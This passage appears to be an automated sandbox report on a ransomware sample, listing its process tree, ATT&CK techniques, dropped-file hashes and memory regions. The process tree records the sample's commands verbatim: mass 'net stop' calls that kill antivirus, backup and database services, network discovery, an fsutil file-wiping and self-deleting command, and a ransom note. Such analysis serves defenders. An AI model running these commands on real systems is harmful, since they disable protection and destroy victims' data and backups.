C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
3⤵
PID:5604

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
3⤵
PID:5596

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
3⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
3⤵
PID:5580

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
3⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
3⤵
PID:5564

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
3⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
3⤵
PID:5548

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
3⤵
PID:5540

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:5532

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
3⤵
PID:5524

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
3⤵
PID:5516

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
3⤵
PID:5508

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:5500

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
3⤵
PID:5492

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:5484

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
3⤵
PID:5476

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
3⤵
PID:5468

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
3⤵
PID:5460

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
3⤵
PID:5452

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
3⤵
PID:5444

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:5436

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
3⤵
PID:5428

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
3⤵
PID:5420

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
3⤵
PID:5412

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
3⤵
PID:5404

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
3⤵
PID:5396

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:5388

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
3⤵
PID:5380

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:5372

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:5364

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
3⤵
PID:5352

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
3⤵
PID:5344

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:5336

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
3⤵
PID:5328

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
3⤵
PID:5320

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
3⤵
PID:5312

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
3⤵
PID:5304

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
3⤵
PID:5296

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:5288

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:5280

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
3⤵
PID:5272

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
3⤵
PID:5264

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
3⤵
PID:5256

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
3⤵
PID:5248

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
3⤵
PID:5240

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
3⤵
PID:5232

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
3⤵
PID:5220

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
3⤵
PID:5212

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
3⤵
PID:5204

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
3⤵
PID:5196

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
3⤵
PID:5188

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
3⤵
PID:5180

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:5172

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:5160

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
3⤵
PID:5152

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
3⤵
PID:5144

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
3⤵
PID:5136

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
3⤵
PID:5124

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:4856

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
3⤵
PID:4988

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
3⤵
PID:4936

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
3⤵
PID:2632

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
3⤵
PID:4784

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:4528

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
3⤵
PID:4792

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
3⤵
PID:4624

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:4668

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
3⤵
PID:4720

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
3⤵
PID:4576

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:4600

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:4492

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
3⤵
PID:4448

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:4440

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
3⤵
PID:4344

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
3⤵
PID:4356

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:4212

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
3⤵
PID:4276

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
3⤵
PID:4184

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
3⤵
PID:5072

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
3⤵
PID:4892

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
3⤵
PID:4280

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
3⤵
PID:4244

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
3⤵
PID:4176

C:\Windows\SysWOW64\arp.exe
"arp" -a
3⤵
PID:16552

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36
3⤵
PID:3180

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
3⤵
- Opens file in notepad (likely ransom note)
PID:13156

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
3⤵
PID:15488

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
4⤵
- Runs ping.exe
PID:4852

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
4⤵
PID:16164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
3⤵
PID:13084

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:13620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:4704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:4808

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:7180

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:7176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:11008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:10996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:10664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:8156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:12960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:13768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:13760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:13752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:13744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:13736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:13728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:13720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:13712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:13704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:13696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:13688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:13680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:13672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:13664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:13656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:13648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:13640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:13624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:13616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:13608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:13600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:13592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:13584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:13576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:13568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:13560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:13552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:13424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:13412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:11096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:10968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:10888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:11892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:6816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:4376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:13304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:13296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:13288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:13280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:13272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:13256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:13248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:13240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:13232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:13224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:13216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:13208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:13200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:13192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:13184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:13176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:13168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:13160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:13152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:13144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:13136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:13128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:13120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:13112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:13104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:13096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:13088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:13080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:13072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:13064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:13056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:13048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:13040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:13032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:13024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:13016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:13008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:13000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:12992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:12984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:12976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:12968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:12952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:12944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:12936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:12928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:12920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:12892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:12872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:12864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:14244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:14236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:14220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:14588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:14436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:14420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:14356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:14348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:14316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:14308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:14300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:4848

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8090c44bf3c0a0ced1fa3521427283c7

SHA1
15a7164e7e07fb1fd14c30f7659474a3548b9656

SHA256
1cb4783d70e7a604b6be5ba014bbcad1a216c348e8412b1a375bc3a275ff3645

SHA512
125c546d0b7b56c2473652ce416ba01c32a2bf65785e8a4c542df71dbc1499eeb31ee516e673eb97c929c9059495597b379e11e27316ea4d080ce232c557c35f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3a61bd5c0251a404c775adfc9efb1b1f

SHA1
e52c8bfabab35871281829b623403d1d346c9f02

SHA256
a9ec62edeff487f4c1e1136b6f31cef41095105df33b922d442cd608702e24a1

SHA512
2a1477c23608e2923184eb0cf7f4f08dbd40e163900f79b4169a15c104ef0b4a65980f7e6f6ca044957c38274f783a71a8d577aefaa1739e1e2f7559607cc971

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
MD5
8edfa3b1705fa1d4c006dd0bde248bdb

SHA1
9a607d0a1410c9fab84d683b1661ebb512128fbd

SHA256
1f7dfc5cb2e65846555688a879e8f53c196cf6278fad79ad124144f2b3705ac2

SHA512
c07a645494006a2acfaf2894e9a303402f0b8845897c461c943f1be762fc18571aad9bc748c53eb15adbb0a5ee1015c0d56432163bdb2ee7dc39bab3a85df14f

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
MD5
8edfa3b1705fa1d4c006dd0bde248bdb

SHA1
9a607d0a1410c9fab84d683b1661ebb512128fbd

SHA256
1f7dfc5cb2e65846555688a879e8f53c196cf6278fad79ad124144f2b3705ac2

SHA512
c07a645494006a2acfaf2894e9a303402f0b8845897c461c943f1be762fc18571aad9bc748c53eb15adbb0a5ee1015c0d56432163bdb2ee7dc39bab3a85df14f

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
MD5
e2eb53aa5d61f5a85813284a0b0cb3b6

SHA1
296c7d763cfcebcf11d58014d5d7725639d211d2

SHA256
3777a46a1113d2d8e52260ed3c99e745604d0cbccd3d1b8245d856855e0db05a

SHA512
7b00b8718d42b4c70cc7babcd4d0a8bb9b1b2e8ed1f910ce1b12733479d8bcbe26dd948fe5e4207fc4d6f9d3d238d505184f9fa23ecebbf8e32115cbd87f2bdf

Download Submit
memory/908-43-0x0000000000000000-mapping.dmp

Download
memory/1096-42-0x0000000000000000-mapping.dmp

Download
memory/1388-66-0x0000000000000000-mapping.dmp

Download
memory/1508-49-0x0000000000000000-mapping.dmp

Download
memory/1544-54-0x0000000000000000-mapping.dmp

Download
memory/1644-62-0x0000000000000000-mapping.dmp

Download
memory/1732-59-0x0000000000000000-mapping.dmp

Download
memory/1808-64-0x0000000000000000-mapping.dmp

Download
memory/1892-45-0x0000000000000000-mapping.dmp

Download
memory/2032-40-0x0000000000000000-mapping.dmp

Download
memory/2100-41-0x0000000000000000-mapping.dmp

Download
memory/2260-56-0x0000000000000000-mapping.dmp

Download
memory/2408-63-0x0000000000000000-mapping.dmp

Download
memory/2456-65-0x0000000000000000-mapping.dmp

Download
memory/2576-57-0x0000000000000000-mapping.dmp

Download
memory/2640-50-0x0000000000000000-mapping.dmp

Download
memory/2828-5-0x0000000072FA0000-0x000000007368E000-memory.dmp

Filesize
6.9MB

Download
memory/2828-6-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/2828-8-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/2828-9-0x0000000004B70000-0x0000000004B71000-memory.dmp

Filesize
4KB

Download
memory/2828-2-0x0000000000000000-mapping.dmp

Download
memory/3096-44-0x0000000000000000-mapping.dmp

Download
memory/3192-52-0x0000000000000000-mapping.dmp

Download
memory/3516-60-0x0000000000000000-mapping.dmp

Download
memory/3592-20-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/3592-21-0x0000000007D00000-0x0000000007D01000-memory.dmp

Filesize
4KB

Download
memory/3592-17-0x0000000007490000-0x0000000007491000-memory.dmp

Filesize
4KB

Download
memory/3592-33-0x0000000008D90000-0x0000000008D91000-memory.dmp

Filesize
4KB

Download
memory/3592-15-0x0000000000952000-0x0000000000953000-memory.dmp

Filesize
4KB

Download
memory/3592-34-0x0000000008F50000-0x0000000008F51000-memory.dmp

Filesize
4KB

Download
memory/3592-10-0x0000000000000000-mapping.dmp

Download
memory/3592-19-0x00000000075F0000-0x00000000075F1000-memory.dmp

Filesize
4KB

Download
memory/3592-31-0x0000000008A10000-0x0000000008A11000-memory.dmp

Filesize
4KB

Download
memory/3592-22-0x0000000007C70000-0x0000000007C71000-memory.dmp

Filesize
4KB

Download
memory/3592-14-0x0000000000950000-0x0000000000951000-memory.dmp

Filesize
4KB

Download
memory/3592-35-0x0000000000953000-0x0000000000954000-memory.dmp

Filesize
4KB

Download
memory/3592-16-0x0000000006BE0000-0x0000000006BE1000-memory.dmp

Filesize
4KB

Download
memory/3592-32-0x000000007E500000-0x000000007E501000-memory.dmp

Filesize
4KB

Download
memory/3592-36-0x0000000006810000-0x0000000006811000-memory.dmp

Filesize
4KB

Download
memory/3592-24-0x0000000008A40000-0x0000000008A73000-memory.dmp

Filesize
204KB

Download
memory/3592-13-0x0000000006C80000-0x0000000006C81000-memory.dmp

Filesize
4KB

Download
memory/3592-12-0x00000000041E0000-0x00000000041E1000-memory.dmp

Filesize
4KB

Download
memory/3592-38-0x0000000006800000-0x0000000006801000-memory.dmp

Filesize
4KB

Download
memory/3592-11-0x0000000072FA0000-0x000000007368E000-memory.dmp

Filesize
6.9MB

Download
memory/3616-58-0x0000000000000000-mapping.dmp

Download
memory/3692-61-0x0000000000000000-mapping.dmp

Download
memory/3824-55-0x0000000000000000-mapping.dmp

Download
memory/3848-47-0x0000000000000000-mapping.dmp

Download
memory/3928-48-0x0000000000000000-mapping.dmp

Download
memory/3960-53-0x0000000000000000-mapping.dmp

Download
memory/3964-46-0x0000000000000000-mapping.dmp

Download
memory/4064-51-0x0000000000000000-mapping.dmp

Download
memory/4128-67-0x0000000000000000-mapping.dmp

Download
memory/4136-101-0x0000000000000000-mapping.dmp

Download
memory/4144-68-0x0000000000000000-mapping.dmp

Download
memory/4176-69-0x0000000000000000-mapping.dmp

Download
